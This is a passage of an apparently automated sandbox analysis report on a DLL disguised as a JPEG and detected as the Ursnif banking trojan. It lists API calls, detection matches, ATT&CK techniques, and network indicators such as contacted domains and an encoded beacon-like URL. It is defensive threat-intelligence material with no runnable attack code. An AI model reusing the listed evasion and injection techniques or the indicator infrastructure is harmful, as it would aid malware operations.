            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: unknown VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_004019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,1_2_004019C7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04F65DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_04F65DC6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00401799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401799

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6396, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.298876856.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298930970.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298914793.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.628060995.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298824563.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298690231.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298657792.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298734803.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.298607542.0000000005928000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6396, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 343092 Sample: pan0ramic0.jpg.dll Startdate: 22/01/2021 Architecture: WINDOWS Score: 64 25 gstatuslog.com 2->25 35 Yara detected  Ursnif 2->35 37 Machine Learning detection for sample 2->37 39 PE file has a writeable .text section 2->39 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 regsvr32.exe 9->11         started        14 cmd.exe 1 9->14         started        signatures6 41 Writes or reads registry keys via WMI 11->41 43 Writes registry values via WMI 11->43 16 iexplore.exe 1 61 14->16         started        process7 process8 18 iexplore.exe 146 16->18         started        21 iexplore.exe 25 16->21         started        23 iexplore.exe 29 16->23         started        dnsIp9 27 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49744, 49745 FASTLYUS United States 18->27 29 www.msn.com 18->29 33 7 other IPs or domains 18->33 31 ocsp.sca1b.amazontrust.com 13.224.195.167, 49767, 49768, 80 AMAZON-02US United States 21->31

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pan0ramic0.jpg.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            1.2.regsvr32.exe.4f60000.7.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            tls13.taboola.map.fastly.net0%VirustotalBrowse
            ocsp.sca1b.amazontrust.com0%VirustotalBrowse
            gstatuslog.com1%VirustotalBrowse
            img.img-taboola.com1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            http://ocsp.sca1b.amazontrust.com/images/pWO7gR1H/D7HcuyFwtqQyc2f7q30Sd_2/FpvO8g9Yt5/2sg_2BRDopkySLofc/dkvmiGq3mHQj/9cyQdhK_2B9/azaTrmORrQeoXS/bACWS0fxUaX55PQ_2Fz1L/SGv7j6lLaBvkjGGO/vKK54z_2Boqw2T6/kG6Y8SdQIYEyKDgkqr/xQr9PXAUv/_2FGBrMyPIWHK67_2Btq/cGu_2BgqH_2BAaZKhVo/ScaI1GsuG5Cl_2/FdCVaSy.avi0%Avira URL Cloudsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            2.18.68.31
            truefalse
              high
              tls13.taboola.map.fastly.net
              151.101.1.44
              truefalseunknown
              ocsp.sca1b.amazontrust.com
              13.224.195.167
              truefalseunknown
              hblg.media.net
              2.18.68.31
              truefalse
                high
                lg3.media.net
                2.18.68.31
                truefalse
                  high
                  gstatuslog.com
                  141.136.42.30
                  truefalseunknown
                  web.vortex.data.msn.com
                  unknown
                  unknownfalse
                    high
                    www.msn.com
                    unknown
                    unknownfalse
                      high
                      srtb.msn.com
                      unknown
                      unknownfalse
                        high
                        img.img-taboola.com
                        unknown
                        unknownfalseunknown
                        cvision.media.net
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ocsp.sca1b.amazontrust.com/images/pWO7gR1H/D7HcuyFwtqQyc2f7q30Sd_2/FpvO8g9Yt5/2sg_2BRDopkySLofc/dkvmiGq3mHQj/9cyQdhK_2B9/azaTrmORrQeoXS/bACWS0fxUaX55PQ_2Fz1L/SGv7j6lLaBvkjGGO/vKK54z_2Boqw2T6/kG6Y8SdQIYEyKDgkqr/xQr9PXAUv/_2FGBrMyPIWHK67_2Btq/cGu_2BgqH_2BAaZKhVo/ScaI1GsuG5Cl_2/FdCVaSy.avifalse
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://searchads.msn.net/.cfm?&&kp=1&~DF15357C5499AE2212.TMP.4.drfalse
                            high
                            https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.5.drfalse
                              high
                              https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.5.drfalse
                                high
                                https://www.remixd.com/privacy_policy.htmliab2Data[1].json.5.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/de-ch/news/other/nach-dem-flockdown-parkpl%c3%a4tze-dienen-der-stadt-z%c3%bcrichde-ch[1].htm.5.drfalse
                                  high
                                  https://onedrive.live.com;Fotos85-0f8009-68ddb2ab[1].js.5.drfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.symantec.compan0ramic0.jpg.dllfalse
                                    high
                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.5.drfalse
                                      high
                                      https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel85-0f8009-68ddb2ab[1].js.5.drfalse
                                        high
                                        http://ogp.me/ns/fb#de-ch[1].htm.5.drfalse
                                          high
                                          https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=httde-ch[1].htm.5.drfalse
                                            high
                                            https://outlook.live.com/mail/deeplink/compose;Kalender85-0f8009-68ddb2ab[1].js.5.drfalse
                                              high
                                              https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg~DF15357C5499AE2212.TMP.4.drfalse
                                                high
                                                https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.5.drfalse
                                                  high
                                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn85-0f8009-68ddb2ab[1].js.5.drfalse
                                                    high
                                                    https://web.vortex.data.msn.com/collect/v1de-ch[1].htm.5.drfalse
                                                      high
                                                      https://www.skype.com/de-ch[1].htm.5.drfalse
                                                        high
                                                        https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.5.drfalse
                                                          high
                                                          https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.5.drfalse
                                                            high
                                                            https://onedrive.live.com/?qt=allmyphotos;Aktuelle85-0f8009-68ddb2ab[1].js.5.drfalse
                                                              high
                                                              https://www.msn.com/de-ch/news/other/nach-razzia-gegen-mutmassliche-neonazis-rechtsextreme-junge-tatde-ch[1].htm.5.drfalse
                                                                high
                                                                https://www.msn.com/de-ch/news/other/auto-der-milit%c3%a4rpolizei-kollidiert-mit-tram/ar-BB1cZe9U?ocde-ch[1].htm.5.drfalse
                                                                  high
                                                                  https://amzn.to/2TTxhNgde-ch[1].htm.5.drfalse
                                                                    high
                                                                    https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                      high
                                                                      https://client-s.gateway.messenger.live.com85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                        high
                                                                        https://www.brightcom.com/privacy-policy/iab2Data[1].json.5.drfalse
                                                                          high
                                                                          https://www.msn.com/de-ch/de-ch[1].htm.5.drfalse
                                                                            high
                                                                            https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                              high
                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1~DF15357C5499AE2212.TMP.4.drfalse
                                                                                high
                                                                                https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.5.drfalse
                                                                                  high
                                                                                  https://bealion.com/politica-de-cookiesiab2Data[1].json.5.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://www.msn.com/de-chde-ch[1].htm.5.drfalse
                                                                                    high
                                                                                    https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.5.drfalse
                                                                                      high
                                                                                      https://twitter.com/i/notifications;Ich85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                        high
                                                                                        https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.5.drfalse
                                                                                          high
                                                                                          https://www.gadsme.com/privacy-policy/iab2Data[1].json.5.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://portal.eu.numbereight.me/policies-license#software-privacy-noticeiab2Data[1].json.5.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.5.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-ch/news/other/die-stadt-z%c3%bcrich-schnappt-sich-einen-begehrten-kita-standode-ch[1].htm.5.drfalse
                                                                                              high
                                                                                              https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                high
                                                                                                https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.5.drfalse
                                                                                                  high
                                                                                                  http://ogp.me/ns#de-ch[1].htm.5.drfalse
                                                                                                    high
                                                                                                    https://docs.prebid.org/privacy.htmliab2Data[1].json.5.drfalse
                                                                                                      high
                                                                                                      https://onedrive.live.com/?qt=mru;OneDrive-App85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                        high
                                                                                                        https://www.skype.com/de85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                          high
                                                                                                          https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.5.drfalse
                                                                                                            high
                                                                                                            https://www.skype.com/de/download-skype85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                              high
                                                                                                              https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downliab2Data[1].json.5.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.5.drfalse
                                                                                                                high
                                                                                                                http://www.hotmail.msn.com/pii/ReadOutlookEmail/85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                  high
                                                                                                                  https://channelpilot.co.uk/privacy-policyiab2Data[1].json.5.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://onedrive.live.com;OneDrive-App85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  low
                                                                                                                  https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.5.drfalse
                                                                                                                    high
                                                                                                                    https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drfalse
                                                                                                                      high
                                                                                                                      https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=185-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                        high
                                                                                                                        https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                          high
                                                                                                                          https://www.admo.tv/en/privacy-policyiab2Data[1].json.5.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://www.msn.com/de-ch/news/other/in-schwamendingen-soll-die-gr%c3%b6sste-z%c3%bcrcher-schulanlagde-ch[1].htm.5.drfalse
                                                                                                                            high
                                                                                                                            https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPathiab2Data[1].json.5.drfalse
                                                                                                                              high
                                                                                                                              https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drfalse
                                                                                                                                high
                                                                                                                                https://www.msn.com/de-ch/news/other/feuerwehr-sperrt-teile-der-altstadt-wegen-dachlawinen/ar-BB1cXQde-ch[1].htm.5.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.com/de-ch[1].htm.5.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.msn.com/de-ch/news/other/ich-habe-mehrere-kritische-man%c3%b6ver-mit-autofahrern-erlebt/de-ch[1].htm.5.drfalse
                                                                                                                                      high
                                                                                                                                      https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862de-ch[1].htm.5.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.msn.com/de-ch/news/other/twitter-sperrt-accounts-von-svp-kantonsrat-claudio-schmid/ar-BBde-ch[1].htm.5.drfalse
                                                                                                                                          high
                                                                                                                                          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DF15357C5499AE2212.TMP.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.5.drfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/?qt=mru;Aktuelle85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehp~DF15357C5499AE2212.TMP.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.5.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.5.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.5.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.bidstack.com/privacy-policy/iab2Data[1].json.5.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://onedrive.live.com/about/en/download/85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://popup.taboola.com/germanauction[1].htm.5.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://listonic.com/privacy/iab2Data[1].json.5.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.msn.com/de-ch/news/other/aus-angst-vor-mutierten-viren-maskenpflicht-f%c3%bcr-z%c3%bcrchde-ch[1].htm.5.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.5.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://twitter.com/de-ch[1].htm.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-dede-ch[1].htm.5.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://quantyoo.de/datenschutziab2Data[1].json.5.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://outlook.live.com/calendar85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.5.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.msn.com/de-ch/news/other/kommentar-es-braucht-keine-staatlichen-kitas-in-der-stadt-z%c3%de-ch[1].htm.5.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://onedrive.live.com/#qt=mru85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.5.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdfiab2Data[1].json.5.drfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://support.skype.com85-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.5.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1~DF15357C5499AE2212.TMP.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.5.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.5.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utmde-ch[1].htm.5.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://related.hu/adatkezeles/iab2Data[1].json.5.drfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://login.skype.com/login/oauth/microsoft?client_id=73813385-0f8009-68ddb2ab[1].js.5.drfalse
                                                                                                                                                                                                high

                                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                Public

                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                13.224.195.167
                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                16509AMAZON-02USfalse
